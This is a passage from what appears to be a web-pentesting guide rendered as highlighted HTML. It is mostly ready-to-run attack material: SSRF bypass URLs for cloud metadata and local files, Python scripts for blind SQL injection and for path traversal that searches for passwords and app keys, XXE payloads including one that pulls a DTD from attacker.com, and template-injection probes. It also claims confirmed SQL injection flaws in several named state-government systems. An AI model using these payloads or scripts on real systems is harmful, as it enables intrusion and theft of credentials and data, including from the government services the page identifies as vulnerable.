&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. IPv6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;[::&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;]:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;[::ffff:&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. URL parser differentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;expected&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;@&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;expected&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#737994;font-style:italic"&gt;#@127.0.0.1/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Shortened URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;bit&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;ly&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;xxxxx &lt;span style="color:#e78284"&gt;→&lt;/span&gt; redirect to metadata endpoint
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. DNS wildcard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;mydomain&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 8. Alternative representations&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# = 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# = 0.0.0.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 9. IDN homograph&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#e78284"&gt;。&lt;/span&gt;attacker&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 10. Cloud metadata endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;latest&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;meta&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;data&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# AWS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;metadata&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;google&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;internal&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;computeMetadata&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;v1&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GCP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;metadata&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;instance&lt;span style="color:#e78284"&gt;?&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;version&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2021&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;02&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;01&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Azure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 11. File:// protocol&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file:&lt;span style="color:#99d1db;font-weight:bold"&gt;///&lt;/span&gt;etc&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;passwd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file:&lt;span style="color:#99d1db;font-weight:bold"&gt;///&lt;/span&gt;proc&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#99d1db"&gt;self&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;environ
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="test-with-oob-out-of-band-callback" &gt;
&lt;div&gt;
&lt;a href="#test-with-oob-out-of-band-callback"&gt;
###
&lt;/a&gt;
Test with OOB (Out-of-Band) Callback
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If the SSRF is blind (no visible response), use a callback to confirm:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Generate unique URL on Burp Collaborator or webhook.site&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Inject into suspicious parameters (url=, path=, redirect=, file=)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check if the callback arrives&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="192-sqli--sql-injection" &gt;
&lt;div&gt;
&lt;a href="#192-sqli--sql-injection"&gt;
##
&lt;/a&gt;
19.2 SQLi — SQL Injection
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="quick-test-time-based-blind" &gt;
&lt;div&gt;
&lt;a href="#quick-test-time-based-blind"&gt;
###
&lt;/a&gt;
Quick Test (Time-Based Blind)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/login&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;payloads &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;normal&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sleep&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#39; OR SLEEP(5)--&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;boolean&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#39; OR &amp;#39;1&amp;#39;=&amp;#39;1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;or_1&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#39;+OR+1=1--&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; label, data &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; payloads&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; start &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(url, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;data, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;15&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; (time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt; start) &lt;span style="color:#99d1db;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;label&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;elapsed&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.0f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;ms | Status: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Size: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;&lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Typical result&lt;/strong&gt;: normal=44ms, sleep=8000ms → SQLi confirmed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: 6 confirmed SQLi in the state government ecosystem:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ESIC: Blind time-based on the password field (185ms normal → 10s+ with SLEEP)&lt;/li&gt;
&lt;li&gt;VOX: both login and password fields vulnerable&lt;/li&gt;
&lt;li&gt;Project Builder: Classic ASP with vulnerable login field&lt;/li&gt;
&lt;li&gt;ITERJ: login and password vulnerable&lt;/li&gt;
&lt;li&gt;CNPJ API: &lt;code&gt;search&lt;/code&gt; parameter vulnerable&lt;/li&gt;
&lt;li&gt;SIHAB-RJ: login and password vulnerable&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All blind — extraction requires SQLmap or a dedicated script.&lt;/p&gt;
&lt;h3 id="193-lfi--path-traversal" &gt;
&lt;div&gt;
&lt;a href="#193-lfi--path-traversal"&gt;
##
&lt;/a&gt;
19.3 LFI / Path Traversal
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Classic payloads&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;../../../etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;....//....//....//etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;etc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;php://filter/convert.base64-encode/resource=index.php&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;php://filter/read=convert.base64-encode/resource=../../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;file:///etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;....//....//....//proc/self/environ&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; paths:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/download?file=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;root:&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 LFI: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="194-xxe--xml-external-entity" &gt;
&lt;div&gt;
&lt;a href="#194-xxe--xml-external-entity"&gt;
##
&lt;/a&gt;
19.4 XXE — XML External Entity
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!DOCTYPE foo [
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt; &amp;lt;!ENTITY xxe SYSTEM &amp;#34;file:///etc/passwd&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;&amp;lt;data&amp;gt;&lt;/span&gt;&lt;span style="color:#81c8be"&gt;&amp;amp;xxe;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;&amp;lt;/data&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- OOB (blind XXE) --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!DOCTYPE foo [
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt; &amp;lt;!ENTITY % xxe SYSTEM &amp;#34;http://attacker.com/xxe.dtd&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; %xxe;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="195-ssti--server-side-template-injection" &gt;
&lt;div&gt;
&lt;a href="#195-ssti--server-side-template-injection"&gt;
##
&lt;/a&gt;
19.5 SSTI — Server-Side Template Injection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Probes for detection (mathematical evaluation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;probes &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;{{7*7}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Jinja2, Twig&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;${7*7}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Freemarker, Velocity&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;lt;%= 7*7 %&amp;gt;&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# ERB (Ruby)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;#{7*7}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Ruby string interpolation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;{{7*&amp;#39;7&amp;#39;}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Twig (49)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;${{7*7}}&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Groovy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
